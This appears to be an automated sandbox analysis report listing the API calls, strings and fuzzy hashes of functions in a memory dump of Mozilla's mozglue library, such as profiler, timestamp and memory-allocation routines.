                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                  • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                  • API String ID: 1281939033-809102171
                                                                  • Opcode ID: 6de96a8f95967ef155fbb70ce60ef6dc707674b27dfc190dbb188557f6912a85
                                                                  • Instruction ID: 6293290952a00f45e6ea4bd3bdabf5d9b5de93784515b268ce1b0e3cf49d7e22
                                                                  • Opcode Fuzzy Hash: 6de96a8f95967ef155fbb70ce60ef6dc707674b27dfc190dbb188557f6912a85
                                                                  • Instruction Fuzzy Hash: A141D235B013119BDB109B64D818BAAB7F9EB45319F148119ED0A97B41CF31B805DBE2
                                                                  APIs
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C0756D1
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0756E9
                                                                  • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C0756F1
                                                                  • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C075744
                                                                  • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C0757BC
                                                                  • GetTickCount64.KERNEL32 ref: 6C0758CB
                                                                  • EnterCriticalSection.KERNEL32(6C0DF688), ref: 6C0758F3
                                                                  • __aulldiv.LIBCMT ref: 6C075945
                                                                  • LeaveCriticalSection.KERNEL32(6C0DF688), ref: 6C0759B2
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C0DF638,?,?,?,?), ref: 6C0759E9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                  • String ID: MOZ_APP_RESTART$3JT/
                                                                  • API String ID: 2752551254-2750507677
                                                                  • Opcode ID: 468e47e936a42710da90cbbaea3cec20661a58b51fa2f68915d3d5103b18f914
                                                                  • Instruction ID: a2ddab035958614b87a12fb0701ef1b2ac46b3cc6688f418448cc5bb5977f556
                                                                  • Opcode Fuzzy Hash: 468e47e936a42710da90cbbaea3cec20661a58b51fa2f68915d3d5103b18f914
                                                                  • Instruction Fuzzy Hash: 21C16D75A083409FDB19CF28C4406AAF7F9BFDA714F158A1DF8C497660DB30A985CB92
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C0DE784), ref: 6C051EC1
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE784), ref: 6C051EE1
                                                                  • EnterCriticalSection.KERNEL32(6C0DE744), ref: 6C051F38
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE744), ref: 6C051F5C
                                                                  • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C051F83
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE784), ref: 6C051FC0
                                                                  • EnterCriticalSection.KERNEL32(6C0DE784), ref: 6C051FE2
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE784), ref: 6C051FF6
                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C052019
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                  • String ID: Dl$Dl$MOZ_CRASH()$\l$3JT/
                                                                  • API String ID: 2055633661-887851133
                                                                  • Opcode ID: 1a730cc1f542f047a2fd1ec135688e006a380d8d9025505a0945077ae46341e9
                                                                  • Instruction ID: 1c632f4a085a0905771415826a8ad8b5ab6eeb47bbaf28640c5977639a7a1af2
                                                                  • Opcode Fuzzy Hash: 1a730cc1f542f047a2fd1ec135688e006a380d8d9025505a0945077ae46341e9
                                                                  • Instruction Fuzzy Hash: 6241D071B013168BDF409F68C888BAABAF5EF49308F410129EE2597741DB71B9148BD5
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1192971331-2178588373
                                                                  • Opcode ID: 5881c4280773e1b6b67e2f511dea8ea36412d892942e40bd2aaf06a9f7d3109d
                                                                  • Instruction ID: 53b65d90d7d5da9470c9c8e904672c61de73a309f21864a171260640634ad20b
                                                                  • Opcode Fuzzy Hash: 5881c4280773e1b6b67e2f511dea8ea36412d892942e40bd2aaf06a9f7d3109d
                                                                  • Instruction Fuzzy Hash: 00314FB19047058FDB00EF7CD64926EBBF0BF85705F114A2DE99697251EF70A548CB82
                                                                  APIs
                                                                    • Part of subcall function 6C05EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C05EB83
                                                                  • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C09B392,?,?,00000001), ref: 6C0991F4
                                                                    • Part of subcall function 6C08CBE8: GetCurrentProcess.KERNEL32(?,6C0531A7), ref: 6C08CBF1
                                                                    • Part of subcall function 6C08CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0531A7), ref: 6C08CBFA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                  • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview$3JT/
                                                                  • API String ID: 3790164461-109010745
                                                                  • Opcode ID: fef185764d73d1ccd5cdde1e455224111e57a687e59fedac8e38633466265c3f
                                                                  • Instruction ID: f36b05b050f20455e9ebe6cb23aa5e8860b75b036f01e23b6e903d7976214018
                                                                  • Opcode Fuzzy Hash: fef185764d73d1ccd5cdde1e455224111e57a687e59fedac8e38633466265c3f
                                                                  • Instruction Fuzzy Hash: E0B18FB0B012099FDF04CF99C4917AEBBF5AF84318F504529D51AABF80D731AA55CBE2
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C053284,?,?,6C0756F6), ref: 6C053492
                                                                  • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C053284,?,?,6C0756F6), ref: 6C0534A9
                                                                  • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C053284,?,?,6C0756F6), ref: 6C0534EF
                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C05350E
                                                                  • __Init_thread_footer.LIBCMT ref: 6C053522
                                                                  • __aulldiv.LIBCMT ref: 6C053552
                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C053284,?,?,6C0756F6), ref: 6C05357C
                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C053284,?,?,6C0756F6), ref: 6C053592
                                                                    • Part of subcall function 6C08AB89: EnterCriticalSection.KERNEL32(6C0DE370,?,?,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284), ref: 6C08AB94
                                                                    • Part of subcall function 6C08AB89: LeaveCriticalSection.KERNEL32(6C0DE370,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284,?,?,6C0756F6), ref: 6C08ABD1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                  • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll$3JT/
                                                                  • API String ID: 3634367004-1024775661
                                                                  • Opcode ID: d7256b960f6a7671f506ad2bb83bbf3f6e615c2379dd19d81ad92f3f57e87e67
                                                                  • Instruction ID: 6ba3f4062ad6405f5f8eb1434dde0d66cba178f72fb6766201cc05fa3f2c01c6
                                                                  • Opcode Fuzzy Hash: d7256b960f6a7671f506ad2bb83bbf3f6e615c2379dd19d81ad92f3f57e87e67
                                                                  • Instruction Fuzzy Hash: 3C316F71A012069BDF04DFB5C948BAA7BFDFB4A705F508519E945A3A50DE70B904CB60
                                                                  APIs
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C064A68), ref: 6C09945E
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C099470
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C099482
                                                                    • Part of subcall function 6C099420: __Init_thread_footer.LIBCMT ref: 6C09949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09EC84
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09EC8C
                                                                    • Part of subcall function 6C0994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0994EE
                                                                    • Part of subcall function 6C0994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C099508
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09ECA1
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09ECAE
                                                                  • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C09ECC5
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09ED0A
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C09ED19
                                                                  • CloseHandle.KERNEL32(?), ref: 6C09ED28
                                                                  • free.MOZGLUE(00000000), ref: 6C09ED2F
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09ED59
                                                                  Strings
                                                                  • [I %d/%d] profiler_ensure_started, xrefs: 6C09EC94
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                  • String ID: [I %d/%d] profiler_ensure_started
                                                                  • API String ID: 4057186437-125001283
                                                                  • Opcode ID: 15e4b7a8beb4e88c954cc30fb7dc8147f74ab5213cbbc03ca92a433a4cf63b5e
                                                                  • Instruction ID: cdbb70808e0c65ccdf4bd82269b88e477f7d5e898568634dbd9e4508357b99fc
                                                                  • Opcode Fuzzy Hash: 15e4b7a8beb4e88c954cc30fb7dc8147f74ab5213cbbc03ca92a433a4cf63b5e
                                                                  • Instruction Fuzzy Hash: 4D219F75600208ABDF009F64D808BAA77F9FB4626DF148214FD2897741DF31FC069BA2
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C07C5A3
                                                                  • WideCharToMultiByte.KERNEL32 ref: 6C07C9EA
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C07C9FB
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C07CA12
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C07CA2E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C07CAA5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                  • String ID: (null)$0
                                                                  • API String ID: 4074790623-38302674
                                                                  • Opcode ID: 57db8bb9cb6a7c4ec52dc0da290d13d1cf0f0ec1d3dfaf2c59f29c51365b0d68
                                                                  • Instruction ID: a1c3b7cd8a95177897e65f58bffdac7e4cd0b1f18b32632a60650976bb511000
                                                                  • Opcode Fuzzy Hash: 57db8bb9cb6a7c4ec52dc0da290d13d1cf0f0ec1d3dfaf2c59f29c51365b0d68
                                                                  • Instruction Fuzzy Hash: 43A1BD306093419FDB28DF28C58475EBBE1BF8A748F04892DE889D7641DB31E805CBA6
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(?,?,6C09483A,?), ref: 6C054ACB
                                                                  • memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C09483A,?), ref: 6C054AE0
                                                                  • moz_xmalloc.MOZGLUE(?,?,6C09483A,?), ref: 6C054A82
                                                                    • Part of subcall function 6C06CA10: mozalloc_abort.MOZGLUE(?), ref: 6C06CAA2
                                                                  • memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C09483A,?), ref: 6C054A97
                                                                  • moz_xmalloc.MOZGLUE(?,?,6C09483A,?), ref: 6C054A35
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                  • memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C09483A,?), ref: 6C054A4A
                                                                  • moz_xmalloc.MOZGLUE(?,?,6C09483A,?), ref: 6C054AF4
                                                                  • moz_xmalloc.MOZGLUE(?,?,6C09483A,?), ref: 6C054B10
                                                                  • moz_xmalloc.MOZGLUE(?,?,6C09483A,?), ref: 6C054B2C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
                                                                  • String ID: :Hl
                                                                  • API String ID: 4251373892-1436388763
                                                                  • Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                  • Instruction ID: e09fe54af449f84800c0d6ccf0d44e31ded2a4f8fde02321eda88003497a0e87
                                                                  • Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                  • Instruction Fuzzy Hash: DF716AB19007469FCB54CFA8C580AAAB7F5FF09308B50463ED15A9BB41E731F565CB80
                                                                  APIs
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0A8273), ref: 6C0A9D65
                                                                  • free.MOZGLUE(6C0A8273,?), ref: 6C0A9D7C
                                                                  • free.MOZGLUE(?,?), ref: 6C0A9D92
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C0A9E0F
                                                                  • free.MOZGLUE(6C0A946B,?,?), ref: 6C0A9E24
                                                                  • free.MOZGLUE(?,?,?), ref: 6C0A9E3A
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C0A9EC8
                                                                  • free.MOZGLUE(6C0A946B,?,?,?), ref: 6C0A9EDF
                                                                  • free.MOZGLUE(?,?,?,?), ref: 6C0A9EF5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                  • String ID: 3JT/
                                                                  • API String ID: 956590011-2178588373
                                                                  • Opcode ID: 9a698ef585d92eb46b80de29a62b25542aa9e9d49c493bdfcd7d3404db7ba2b5
                                                                  • Instruction ID: 79c94d656aab51d83bb2d91b87780e6b155f9ce56476d777e1223ce628c5b7a2
                                                                  • Opcode Fuzzy Hash: 9a698ef585d92eb46b80de29a62b25542aa9e9d49c493bdfcd7d3404db7ba2b5
                                                                  • Instruction Fuzzy Hash: E4719F74A09B418BD716CF98C48069BF3F4FF99315B448619E85A5BB02EB31F8C6CB91
                                                                  APIs
                                                                  • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C07C784
                                                                  • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C07C801
                                                                  • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C07C83D
                                                                  • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C07C891
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                                                  • String ID: INF$NAN$inf$nan
                                                                  • API String ID: 1991403756-4166689840
                                                                  • Opcode ID: 448c049bf5d5ca4a655661205cbef484ad6f39f758de1ba1297c57ea81a98c4c
                                                                  • Instruction ID: ac74a58399921da01b5b916653445a063ad120b2a6834e9b1cd8471d5c41335d
                                                                  • Opcode Fuzzy Hash: 448c049bf5d5ca4a655661205cbef484ad6f39f758de1ba1297c57ea81a98c4c
                                                                  • Instruction Fuzzy Hash: 065172706087408BD7149F6CC58139EFBF0BF8A318F408A2DE9D5A7651EB70E9858B56
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C08D9DB), ref: 6C08F2D2
                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6C08F2F5
                                                                  • moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6C08F386
                                                                  • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C08F347
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                  • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C08F3C8
                                                                  • free.MOZGLUE(00000000,00000000), ref: 6C08F3F3
                                                                  • free.MOZGLUE(00000000,00000000), ref: 6C08F3FC
                                                                  • free.MOZGLUE(00000000,?,?,00000000), ref: 6C08F413
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: freemoz_xmalloc$HandleModule$malloc
                                                                  • String ID: ntdll.dll$3JT/
                                                                  • API String ID: 301460908-189901455
                                                                  • Opcode ID: 1d2b406426c94f138e5325a8d43d06b1bcc780caa58489c0cdeb9f79b0c26a75
                                                                  • Instruction ID: 76ca8b125b53bbcbfb58f6308e69cab3a3d1d7216987143e9e017c35e8aaef75
                                                                  • Opcode Fuzzy Hash: 1d2b406426c94f138e5325a8d43d06b1bcc780caa58489c0cdeb9f79b0c26a75
                                                                  • Instruction Fuzzy Hash: B04120B1A062048BDF089F39D84079EB7F8EF45318F24842DD91AA7B80EB30B444C791
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0AABB4
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C064A63), ref: 6C0AABC0
                                                                  • ReleaseSRWLockExclusive.KERNEL32 ref: 6C0AAC06
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0AAC16
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0AAC27
                                                                  • ReleaseSRWLockExclusive.KERNEL32 ref: 6C0AAC66
                                                                  • free.MOZGLUE(?), ref: 6C0AAD19
                                                                  • free.MOZGLUE(00000000), ref: 6C0AAD2B
                                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(00000000), ref: 6C0AAD38
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree$Xbad_function_call@std@@
                                                                  • String ID: 3JT/
                                                                  • API String ID: 2167474191-2178588373
                                                                  • Opcode ID: c07842b5610bc5f20dcc63c3ca9bafe1d0d4c5d68aca5959e11962640fd90e5f
                                                                  • Instruction ID: 049e7a5bc5bb069c5863368561ced02af37c797372bbfe6dbd5220103330462d
                                                                  • Opcode Fuzzy Hash: c07842b5610bc5f20dcc63c3ca9bafe1d0d4c5d68aca5959e11962640fd90e5f
                                                                  • Instruction Fuzzy Hash: 46515974600B058FD724DFA5C48875AB7F6FF89714F204A2DD8AA87B91EB30B849CB51
                                                                  APIs
                                                                  • ?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000000,00000002,00000040,?,?,6C0ABCAE,?,?,6C09DC2C), ref: 6C0ACB52
                                                                  • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,?,6C0ABCAE,?,?,6C09DC2C), ref: 6C0ACB82
